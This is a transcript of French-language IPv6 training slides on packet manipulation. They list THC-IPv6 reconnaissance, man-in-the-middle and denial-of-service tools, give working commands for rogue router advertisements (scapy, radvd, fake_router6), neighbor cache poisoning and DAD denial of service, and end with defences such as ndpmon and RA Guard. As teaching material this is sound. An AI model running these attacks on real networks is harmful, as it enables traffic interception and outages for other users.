IPv6 0x0B Manipulation de Paquets

21
goffinet@goffinet, Protocole IPv6, CC-BY 11. Manipulation de paquets IPv6 Internet Nouvelle Génération François-Emmanuel Goffinet Formateur IT 2013Q4

description

Différentes types attaques : Reconnaissance, MitM, DoS, spoofingDifférentes portées : Routage extérieur, routage intérieur, LAN, Internet, Différentes faibless protocolaires : SLAAC, ICMPv6, ND, NS, NA, RA, DNS, DHCPv6.

Transcript of IPv6 0x0B Manipulation de Paquets

  • goffinet@goffinet, Protocole IPv6, CC-BY

    11. Manipulation de paquets IPv6

    Internet Nouvelle GnrationFranois-Emmanuel Goffinet

    Formateur IT2013Q4

  • goffinet@goffinet, Protocole IPv6, CC-BY

    Programme1. Pourquoi IPv6 ?2. Fondamentaux IPv63. Paquets IPv64. Reprsentations des adresses IPv65. Types dadresses IPv66. Dcouverte de voisinage et adresse automatique7. Plan dadressage IPv68. Routage IPv69. Gestion dadresses IPv6 (IPAM)

    10. Introduction la scurit IPv611. Manipulation de paquets12. Firewalling IPv613. IPSEC IPv614. Applications IPv615. Mthodes de transition

  • goffinet@goffinet, Protocole IPv6, CC-BY

    Manipulation de paquets IPv6

    Leon 11

  • goffinet@goffinet, Protocole IPv6, CC-BY

    Attaques, faiblesses, outils

    Diffrentes types attaques : Reconnaissance, MitM, DoS, spoofingDiffrentes portes : Routage extrieur, routage intrieur, LAN, Internet, Diffrentes faibless protocolaires : SLAAC, ICMPv6, ND, NS, NA, RA, DNS, DHCPv6.

  • goffinet@goffinet, Protocole IPv6, CC-BY

    Installation des outils

    Installation de THC-IPv6apt-get install build-essential libpcap0.8-dev libssl-dev

    wget http://www.thc.org/releases/thc-ipv6-2.3.tar.gz

    tar xvfz thc-ipv6-2.3.tar.gz

    cd thc-ipv6-2.3/

    make

    make install

    Installation nmap, scapy, tcpdumpapt-get install python-scapy nmap tcpdump

    Capture de paquetstcpdump -w IPv6.pcap -i eth0 -vv ip6

  • goffinet@goffinet, Protocole IPv6, CC-BY

    Reconnaissance

    nmap -6 : scans de ports alive6 : Montre les adresses prsentes sur le segment passive_discovey6 : Sniff passif qui dtecte toute

    adresse IP. Se combine avec parasite6 dans un environnment commut

    trace6 : Traceroute rapide avec rsolution DNS et dtection de tunnel (changement de MTU).

  • goffinet@goffinet, Protocole IPv6, CC-BY

    nmap -6 nmap -6 -v -sT fe80::1

    Starting Nmap 6.00 ( http://nmap.org ) at 2013-12-10 21:42 CETInitiating ND Ping Scan at 21:42Scanning fe80::1 [1 port]Completed ND Ping Scan at 21:42, 0.04s elapsed (1 total hosts)Initiating System DNS resolution of 1 host. at 21:42Completed System DNS resolution of 1 host. at 21:42, 0.34s elapsedInitiating Connect Scan at 21:42Scanning fe80::1 [1000 ports]Strange error from connect (22):Invalid argumentCompleted Connect Scan at 21:42, 0.01s elapsed (1000 total ports)Nmap scan report for fe80::1Host is up (0.0015s latency).All 1000 scanned ports on fe80::1 are filteredMAC Address: 00:0C:CE:D9:23:00 (Cisco Systems)

    Read data files from: /usr/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in 0.47 seconds Raw packets sent: 1 (72B) | Rcvd: 1 (72B)

  • goffinet@goffinet, Protocole IPv6, CC-BY

    alive6

    alive6 eth0Alive: 2001:470:cbf7:1ab:7ec3:a1ff:fe89:b96f [ICMP parameter problem]Alive: 2001:470:cbf7:1ab:ba27:ebff:fe59:70f3 [ICMP echo-reply]Alive: 2001:470:cbf7:1ab::1 [ICMP echo-reply]Scanned 1 address and found 3 systems alive

    http://www.cloudshark.org/captures/bed61f75bde3

  • goffinet@goffinet, Protocole IPv6, CC-BY

    passive_discovery6passive_discovery6 eth0Started IPv6 passive system detection (Press Control-C to end) ...Detected: 2001:470:cbf7:1ab:829:6ff7:4b6a:2284Detected: fe80::1Detected: 2001:470:20::2Detected: 2a00:1450:4007:803::1010

  • goffinet@goffinet, Protocole IPv6, CC-BY

    trace6trace6 -dt eth0 cisco.goffinet.orgTrace6 for cisco.goffinet.org (2001:6f8:202:4db::2) with starting MTU 1500: 1: 2001:470:cbf7:1ab::1 () - new MTU 1480 - 6in4 tunnel endpoint 2: 2001:470:1f12:d02::1 (goffinet-2.tunnel.tserv10.par1.ipv6.he.net) 3: 2001:470:0:7b::1 (ge2-3.core1.par1.he.net) 4: 2001:7f8:54::149 (easynet.franceix.net) 5: 2001:6f8:1:1:87:86:76:19 () 6: 2001:6f8:1:2:87:86:71:165 () 7: 2001:6f8:200:1003::10 (bebru01.sixxs.net) - new MTU 1280 8: 2001:6f8:202:4db::1 (gw-1244.bru-01.be.sixxs.net) 9: 2001:6f8:202:4db::2 (cl-1244.bru-01.be.sixxs.net) [ping reply received]

  • goffinet@goffinet, Protocole IPv6, CC-BY

    Autres outils de reconnaissanceAlive Scanning: Alive scanning techniques: alive6 ICMPv6 Inverse Lookup: inverse_lookup6 ICMPv6 Node Query: node_query6

    DNS enumeration: Brute: dnsdict6 Reverse: dnsrevenum6 DNSSEC: dnssecwalk

    Local Discovery: NS: detect-new-ip6 Sniff: passive_discovery6 Router : dump_router6

    Tracerouter: trace6Helper tools: address6

  • goffinet@goffinet, Protocole IPv6, CC-BY

    Attaques MitM ICMPv6 Redirects: redir6, redirsniff6 NDP: parasite6, fake_advertise6 RA: fake_router6, fake_router26 DHCPv6: fake_dhcps6 DNS: fake_dns6d Mobility: fake_mipv6

  • goffinet@goffinet, Protocole IPv6, CC-BY

    Attaques DoSflood_advertise6 flood_dhcpc6 flood_mld6flood_mld26 flood_mldrouter6 flood_redirect6flood_router6 flood_router26 flood_solicitate6denial6 dos-new-ip6 exploit6fake_advertise6 kill_router6 ndpexhaust6ndpexhaust26 rsmurf6 sendpees6sendpeesmp6 smurf6 thcsyn6

  • goffinet@goffinet, Protocole IPv6, CC-BY

    Empoisonnement de cache NDEmpoisonnement de cache de voisinage avec fake_advertise6. Lancer la capture. Vrifier le cache avant et aprs. parasite6 commute le trafic.

  • goffinet@goffinet, Protocole IPv6, CC-BY

    Rogue RA scapy

    Assez trivial, en scapy; THC-IPv6 est plus simple.scapyWelcome to Scapy (2.2.0)>>> q = IPv6()/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefix='2001:db8:bad:bad::', prefixlen=64)/ICMPv6NDOptSrcLLAddr(lladdr='00:0c:29:b7:8e:eb')>>> send(q)

  • goffinet@goffinet, Protocole IPv6, CC-BY

    Rogue RA RADVDapt-get install radvd

    Dans /etc/radvd.conf :interface eth0{AdvSendAdvert on;AdvLinkMTU 1280;prefix 2001:6f8:14d6:1::/64{AdvOnLink on;AdvAutonomous on;#enables clients to autoconf};RDNSS 2001:6f8:14d6:1::1{AdvRDNSSPreference 8;AdvRDNSSLifetime 3600;};};radvd -C /etc/radvd.conf

  • goffinet@goffinet, Protocole IPv6, CC-BY

    fake_router6

    En trois tapes :1. Activation du routagesysctl -w net.ipv6.conf.all.forwarding=1

    2. Route par dfautip route add default via fe80::1 dev eth0

    3. Empoisonnement par RAfake_router6 eth0 2001:470:7B6D:bad::/64

    Vrifier la table de routage et de voisinageavant et aprs lattaque. Capturer les paquets entre la victime et la passerelle. On peut tre plus prcis avec fake_router26.

  • goffinet@goffinet, Protocole IPv6, CC-BY

    Attaque DAD

    A titre dexemple, dos-new-ipv6 rpond toutes les tentatives DAD de telle sorte que plus aucune nouvelle interface ne puisse monter une adresse IPv6. Efficace ...

  • goffinet@goffinet, Protocole IPv6, CC-BY

    ndpmon : surveillance L2

    Installation de ndpmon :http://ndpmon.sourceforge.net/index.php?n=Doc.InstallationConfiguration :http://ndpmon.sourceforge.net/index.php?n=Doc.Configuration

  • goffinet@goffinet, Protocole IPv6, CC-BY

    First Hop Security

    Selon le document Cisco Implementing First Hop Security :

    IPv6 First-Hop Security Binding TableIPv6 Device TrackingIPv6 Port-Based Access List SupportIPv6 Global Policies

    IPv6 RA GuardIPv6 ND Inspection

    Secure Neighbor Discovery in IPv6IPv6 Neighbor Discovery Trust Models and ThreatsSeND ProtocolSeND Deployment ModelsSingle CA Model

  • goffinet@goffinet, Protocole IPv6, CC-BY

    DroitsProtocole IPv6 de [email protected] est

    mis disposition selon les termes de la licence Creative Commons Attribution 4.0

    International.